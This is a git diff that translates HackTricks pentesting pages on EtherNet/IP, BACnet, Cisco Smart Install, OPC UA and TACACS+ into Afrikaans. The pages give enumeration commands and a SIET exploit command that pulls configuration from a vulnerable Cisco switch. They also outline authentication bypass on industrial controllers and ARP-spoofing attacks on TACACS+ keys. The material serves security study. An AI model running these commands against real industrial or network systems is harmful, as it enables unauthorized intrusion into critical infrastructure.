-# **Protocol Information** +# **Protokol-inligting** -EtherNet/IP is an **industrial Ethernet networking protocol** commonly used in **industrial automation control systems**. It was developed by Rockwell Automation in the late 1990s and is managed by ODVA. The protocol ensures **multi-vendor system interoperability** and is utilized in various applications such as **water processing plants**, **manufacturing facilities**, and **utilities**. To identify an EtherNet/IP device, a query is sent to **TCP/44818** with a **list Identities Message (0x63)**. - -**Default port:** 44818 UDP/TCP +EtherNet/IP is 'n **industriële Ethernet-netwerkprotokol** wat algemeen gebruik word in **industriële outomatiseringsbeheerstelsels**. Dit is ontwikkel deur Rockwell Automation in die laat 1990's en word bestuur deur ODVA. Die protokol verseker **multi-vendor-sisteeminteroperabiliteit** en word gebruik in verskeie toepassings soos **waterverwerkingsaanlegte**, **vervaardigingsfasiliteite** en **nutsvoorzienings**. Om 'n EtherNet/IP-toestel te identifiseer, word 'n navraag gestuur na **TCP/44818** met 'n **lys-identiteitsboodskap (0x63)**. +**Verstekpoort:** 44818 UDP/TCP ``` PORT STATE SERVICE 44818/tcp open EtherNet/IP ``` +# **Opsomming** -# **Enumeration** +Enumeration is 'n belangrike stap in die pentesting-proses wat dit moontlik maak om inligting oor 'n teikenstelsel te versamel. Dit behels die identifisering van aktiewe dienste, poorte, protokolle en ander relevante inligting wat kan help om die stelsel te benader en te manipuleer. Hier is 'n paar tegnieke wat gebruik kan word vir enumerasie: +## **1. Port Scanning** +Port scanning is die proses waarin die teikenstelsel se poorte ondersoek word om aktiewe dienste te identifiseer. Dit kan gedoen word deur gebruik te maak van gereedskap soos Nmap, hping3 of netcat. + +## **2. Service Fingerprinting** +Service fingerprinting behels die identifisering van die spesifieke dienste wat op die teikenstelsel beskikbaar is. Dit kan gedoen word deur na spesifieke kenmerke of banners te soek wat deur die dienste uitgestuur word. + +## **3. Protocol Analysis** +Protokolanalise behels die ondersoek van die protokolle wat deur die teikenstelsel gebruik word. Dit kan help om kwesbaarhede of swak punte in die protokolle te identifiseer wat uitgebuit kan word. + +## **4. Directory and File Enumeration** +Hierdie tegniek behels die soek na directories en lêers op die teikenstelsel. Dit kan gedoen word deur gebruik te maak van gereedskap soos DirBuster, Dirsearch of Gobuster. + +## **5. User Enumeration** +User enumerasie behels die identifisering van gebruikers op die teikenstelsel. Dit kan gedoen word deur gebruik te maak van gereedskap soos enum4linux, ldapsearch of brute force-tegnieke. + +## **6. DNS Enumeration** +DNS enumerasie behels die versameling van inligting oor die DNS-infrastruktuur van die teikenstelsel. Dit kan gedoen word deur gebruik te maak van gereedskap soos nslookup, dig of dnsenum. + +## **7. SNMP Enumeration** +SNMP enumerasie behels die identifisering van SNMP-dienste en die versameling van inligting oor die teikenstelsel deur middel van SNMP. Dit kan gedoen word deur gebruik te maak van gereedskap soos snmpwalk, snmp-check of onesixtyone. + +## **8. SMB Enumeration** +SMB enumerasie behels die identifisering van SMB-dienste en die versameling van inligting oor die teikenstelsel deur middel van SMB. Dit kan gedoen word deur gebruik te maak van gereedskap soos enum4linux, smbclient of nmap. + +## **9. SMTP Enumeration** +SMTP enumerasie behels die identifisering van SMTP-dienste en die versameling van inligting oor die teikenstelsel deur middel van SMTP. Dit kan gedoen word deur gebruik te maak van gereedskap soos nmap, smtp-user-enum of metasploit. + +## **10. Web Enumeration** +Web enumerasie behels die identifisering van webdienste en die versameling van inligting oor die teikenstelsel deur middel van webtoepassings. Dit kan gedoen word deur gebruik te maak van gereedskap soos dirb, gobuster of nikto. + +Enumeration is 'n kritieke stap in die pentesting-proses wat die grondslag lê vir verdere aanvalle en uitbuiting van die teikenstelsel. Dit is belangrik om versigtig en eties te wees tydens die enumerasieproses om enige ongewenste skade of inbreuk op die teikenstelsel te voorkom. ```bash nmap -n -sV --script enip-info -p 44818 pip3 install cpppo python3 -m cpppo.server.enip.list_services [--udp] [--broadcast] --list-identity -a ``` - # Shodan -* `port:44818 "product name"` +* `port:44818 "produknaam"`
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
- - diff --git a/network-services-pentesting/47808-udp-bacnet.md b/network-services-pentesting/47808-udp-bacnet.md index 6a118d3d2..7b606eafd 100644 --- a/network-services-pentesting/47808-udp-bacnet.md +++ b/network-services-pentesting/47808-udp-bacnet.md @@ -1,35 +1,30 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repositoriums.
-# Protocol Information +# Protokol Inligting -**BACnet** is a **communications protocol** for Building Automation and Control (BAC) networks that leverages the **ASHRAE**, **ANSI**, and **ISO 16484-5 standard** protocol. It facilitates communication among building automation and control systems, enabling applications such as HVAC control, lighting control, access control, and fire detection systems to exchange information. BACnet ensures interoperability and allows computerized building automation devices to communicate, regardless of the specific services they provide. - -**Default port:** 47808 +**BACnet** is 'n **kommunikasieprotokol** vir Gebou-outomatisering en -beheer (BAC) netwerke wat gebruik maak van die **ASHRAE**, **ANSI**, en **ISO 16484-5 standaardprotokol**. Dit fasiliteer kommunikasie tussen gebou-outomatisering en -beheerstelsels, wat toepassings soos lugversorgingsbeheer, ligbeheer, toegangsbeheer en brandopsporingstelsels in staat stel om inligting uit te ruil. BACnet verseker interoperabiliteit en stel gerekenariseerde gebou-outomatiseringsapparate in staat om te kommunikeer, ongeag die spesifieke dienste wat hulle bied. +**Verstekpoort:** 47808 ```text PORT STATE SERVICE 47808/udp open BACNet -- Building Automation and Control NetworksEnumerate ``` +# Opstel -# Enumeration - -## Manual - +## Handleiding ```bash pip3 install BAC0 import BAC0 @@ -40,14 +35,21 @@ bacnet.vendorName.strValue #I couldn't find how to obtain the same data as nmap with this library or any other #talk me if you know how please ``` +## Outomaties -## Automatic +BACnet is 'n protokol wat gebruik word vir die outomatiese beheer van geboue. Dit maak gebruik van UDP (User Datagram Protocol) vir kommunikasie. UDP is 'n onbetroubare protokol wat nie 'n verbindingsgeoriënteerde verbinding handhaaf nie. Dit beteken dat daar geen bevestiging van ontvangs of herverstuur van verlore pakkette is nie. +Die eerste stap in die outomatiese ontdekking van BACnet-toestelle is om UDP-pakkette na die uitsaai-adres (255.255.255.255) te stuur. Hierdie pakkette sal deur alle toestelle in die netwerk ontvang word. Die toestelle wat BACnet ondersteun, sal reageer met 'n UDP-pakket wat die inligting oor die toestel bevat. + +Die volgende stap is om die BACnet-toestelle te identifiseer en te onderskei. Dit kan gedoen word deur die inhoud van die UDP-pakket te ontleed en die BACnet-objekte en -dienste te identifiseer wat deur die toestel ondersteun word. + +Nadat die toestelle geïdentifiseer is, kan verdere ondersoek gedoen word om die toestel se funksionaliteit en beveiligingskwessies te bepaal. Dit kan insluit die ondersoek van BACnet-objekte, die uitvoering van BACnet-dienste en die identifisering van moontlike kwesbaarhede. + +Dit is belangrik om te verstaan dat die outomatiese ontdekking en ondersoek van BACnet-toestelle slegs uitgevoer mag word op toestelle en netwerke waarvoor jy die regte toestemming het. Onwettige toegang tot BACnet-toestelle kan wettige gevolge hê. ```bash nmap --script bacnet-info --script-args full=yes -sU -n -sV -p 47808 ``` - -This script does not attempt to join a BACnet network as a foreign device, it simply sends BACnet requests directly to an IP addressable device. +Hierdie skrip probeer nie om by 'n BACnet-netwerk aan te sluit as 'n vreemde toestel nie, dit stuur eenvoudig BACnet-versoeke direk na 'n IP-adresbare toestel. ## Shodan @@ -58,16 +60,14 @@ This script does not attempt to join a BACnet network as a foreign device, it si
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
- - diff --git a/network-services-pentesting/4786-cisco-smart-install.md b/network-services-pentesting/4786-cisco-smart-install.md index 3f97bcb2c..f03dc7e9f 100644 --- a/network-services-pentesting/4786-cisco-smart-install.md +++ b/network-services-pentesting/4786-cisco-smart-install.md @@ -1,62 +1,58 @@ -# 4786 - Cisco Smart Install +# 4786 - Cisco Slim Installeer
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
-## Basic Information +## Basiese Inligting -**Cisco Smart Install** is a Cisco designed to automate the initial configuration and loading of an operating system image for new Cisco hardware. **By default, Cisco Smart Install is active on Cisco hardware and uses the transport layer protocol, TCP, with port number 4786.** - -**Default port:** 4786 +**Cisco Slim Installeer** is 'n Cisco-ontwerp wat die outomatiese aanvangskonfigurasie en laai van 'n bedryfstelselbeeld vir nuwe Cisco-hardeware outomatiseer. **Standaard is Cisco Slim Installeer aktief op Cisco-hardeware en gebruik die transportlaagprotokol, TCP, met poortnommer 4786.** +**Standaardpoort:** 4786 ``` PORT STATE SERVICE 4786/tcp open smart-install ``` +## **Slim Installeer Uitbuitingshulpmiddel** -## **Smart Install Exploitation Tool** +**In 2018 is 'n kritieke kwesbaarheid, CVE-2018-0171, in hierdie protokol ontdek. Die dreigingsvlak is 9.8 op die CVSS-skaal.** -**In 2018, a critical vulnerability, CVE-2018–0171, was found in this protocol. The threat level is 9.8 on the CVSS scale.** +**'n Spesiaal vervaardigde pakkie wat na die TCP/4786-poort gestuur word, waar Cisco Slim Installeer aktief is, veroorsaak 'n buffer-oorloop, wat 'n aanvaller in staat stel om:** -**A specially crafted packet sent to the TCP/4786 port, where Cisco Smart Install is active, triggers a buffer overflow, allowing an attacker to:** +* die toestel gedwonge te herlaai +* RCE te roep +* konfigurasies van netwerktoerusting te steel. -* forcibly reboot the device -* call RCE -* steal configurations of network equipment. +**Die** [**SIET**](https://github.com/frostbits-security/SIET) **(Slim Installeer Uitbuitingshulpmiddel)** is ontwikkel om van hierdie kwesbaarheid gebruik te maak, dit stel jou in staat om Cisco Slim Installeer te misbruik. In hierdie artikel sal ek jou wys hoe jy 'n legitieme netwerkhardeware-konfigurasie-lêer kan lees. Konfigurasie-uitvloei kan waardevol wees vir 'n pentester omdat dit hom bewus sal maak van die unieke kenmerke van die netwerk. En dit sal die lewe vergemaklik en nuwe vektore vir 'n aanval vind. -**The** [**SIET**](https://github.com/frostbits-security/SIET) **(Smart Install Exploitation Tool)** was developed to exploit this vulnerability, it allows you to abuse Cisco Smart Install. In this article I will show you how you can read a legitimate network hardware configuration file. Configure exfiltration can be valuable for a pentester because it will learn about the unique features of the network. And this will make life easier and allow finding new vectors for an attack. - -**The target device will be a “live” Cisco Catalyst 2960 switch. Virtual images do not have Cisco Smart Install, so you can only practice on the real hardware.** - -The address of the target switch is **10.10.100.10 and CSI is active.** Load SIET and start the attack. **The -g argument** means exfiltration of the configuration from the device, **the -i argument** allows you to set the IP address of the vulnerable target. +**Die teikentoestel sal 'n "lewende" Cisco Catalyst 2960-sakwees wees. Virtuele beelde het nie Cisco Slim Installeer nie, so jy kan slegs op die regte hardeware oefen.** +Die adres van die teikensakwees is **10.10.100.10 en CSI is aktief.** Laai SIET en begin die aanval. **Die -g-argument** beteken uitvloei van die konfigurasie van die toestel, **die -i-argument** stel jou in staat om die IP-adres van die kwesbare teiken in te stel. ``` ~/opt/tools/SIET$ sudo python2 siet.py -g -i 10.10.100.10 ``` -
-The switch configuration **10.10.100.10** will be in the **tftp/** folder +Die skakelkonfigurasie **10.10.100.10** sal in die **tftp/**-vouer wees.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
diff --git a/network-services-pentesting/4840-pentesting-opc-ua.md b/network-services-pentesting/4840-pentesting-opc-ua.md index 34b7c5bf0..20b933674 100644 --- a/network-services-pentesting/4840-pentesting-opc-ua.md +++ b/network-services-pentesting/4840-pentesting-opc-ua.md @@ -2,63 +2,59 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -**OPC UA**, standing for **Open Platform Communications Unified Access**, is a crucial open-source protocol used in various industries like Manufacturing, Energy, Aerospace, and Defence for data exchange and equipment control. It uniquely enables different vendors' equipment to communicate, especially with PLCs. +**OPC UA**, wat staan vir **Open Platform Communications Unified Access**, is 'n belangrike oopbron-protokol wat in verskeie bedrywe soos Vervaardiging, Energie, Lugvaart en Verdediging gebruik word vir data-uitruiling en toerustingbeheer. Dit maak dit uniek moontlik vir verskillende verskaffers se toerusting om te kommunikeer, veral met PLC's. -Its configuration allows for strong security measures, but often, for compatibility with older devices, these are lessened, exposing systems to risks. Additionally, finding OPC UA services can be tricky since network scanners might not detect them if they're on nonstandard ports. - -**Default port:** 4840 +Die konfigurasie maak sterk sekuriteitsmaatreëls moontlik, maar dikwels word hierdie maatreëls verminder vir die verenigbaarheid met ouer toestelle, wat stelsels aan risiko's blootstel. Daarbenewens kan dit moeilik wees om OPC UA-dienste te vind, aangesien netwerk-skandeerders dit dalk nie sal opspoor as hulle op nie-standaardpoorte is nie. +**Standaardpoort:** 4840 ```text PORT STATE SERVICE REASON 4840/tcp open unknown syn-ack ``` - ## Pentesting OPC UA -To reveal security issues in OPC UA servers, scan it with [OpalOPC](https://opalopc.com/). - +Om sekuriteitsprobleme in OPC UA-bedieners bloot te stel, skandeer dit met [OpalOPC](https://opalopc.com/). ```bash opalopc -vv opc.tcp://$target_ip_or_hostname:$target_port ``` +### Uitbuiting van kwesbaarhede -### Exploiting vulnerabilities +As daar omwegkwesbaarhede vir verifikasie gevind word, kan jy 'n [OPC UA-kliënt](https://www.prosysopc.com/products/opc-ua-browser/) konfigureer en sien wat jy kan toegang kry. Dit kan enigiets van bloot die lees van proseswaardes tot die werklik bedryf van swaar nywerheidsapparatuur moontlik maak. -If authentication bypass vulnerabilities are found, you can configure an [OPC UA client](https://www.prosysopc.com/products/opc-ua-browser/) accordingly and see what you can access. This may allow anything from merely reading process values to actually operating heavy-duty industrial equipment. - -To get a clue of the device you have access to, read the "ServerStatus" node values in the address space and google for a usage manual. +Om 'n idee te kry van die toestel waarop jy toegang het, lees die waardes van die "ServerStatus" node in die adresruimte en soek op Google vir 'n gebruikshandleiding. ## Shodan * `port:4840` -## References +## Verwysings * [https://opalopc.com/how-to-hack-opc-ua/](https://opalopc.com/how-to-hack-opc-ua/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/network-services-pentesting/49-pentesting-tacacs+.md b/network-services-pentesting/49-pentesting-tacacs+.md index 79da37bd5..6ef83ab18 100644 --- a/network-services-pentesting/49-pentesting-tacacs+.md +++ b/network-services-pentesting/49-pentesting-tacacs+.md @@ -2,67 +2,63 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-## Basic Information - -The **Terminal Access Controller Access Control System (TACACS)** protocol is used to centrally validate users trying to access routers or Network Access Servers (NAS). Its upgraded version, **TACACS+**, separates the services into authentication, authorization, and accounting (AAA). +## Basiese Inligting +Die **Terminal Access Controller Access Control System (TACACS)**-protokol word gebruik om gebruikers wat probeer om roeteryers of Netwerktoegangbedieners (NAS) te benader, sentraal te valideer. Sy opgegradeerde weergawe, **TACACS+**, skei die dienste in outentifikasie, magtiging en rekeningkunde (AAA). ``` PORT STATE SERVICE 49/tcp open tacacs ``` +**Verstekpoort:** 49 -**Default port:** 49 +## Onderskep Verifikasiesleutel -## Intercept Authentication Key +As die kommunikasie tussen die klient en TACACS-bediener deur 'n aanvaller onderskep word, kan die **versleutelde verifikasiesleutel onderskep** word. Die aanvaller kan dan 'n **plaaslike brute force-aanval teen die sleutel uitvoer sonder om in die logboeke opgespoor te word**. As die aanval suksesvol is en die sleutel gekraak word, verkry die aanvaller toegang tot die netwerktoerusting en kan die verkeer dekodeer met behulp van hulpmiddels soos Wireshark. -If the client and TACACS server communication is intercepted by an attacker, the **encrypted authentication key can be intercepted**. The attacker can then attempt a **local brute-force attack against the key without being detected in the logs**. If successful in brute-forcing the key, the attacker gains access to the network equipment and can decrypt the traffic using tools like Wireshark. +### Uitvoering van 'n MitM-aanval -### Performing a MitM Attack +'n **ARP-spoofing-aanval kan gebruik word om 'n Man-in-the-Middle (MitM) aanval** uit te voer. -An **ARP spoofing attack can be utilized to perform a Man-in-the-Middle (MitM) attack**. - -### Brute-forcing the Key - 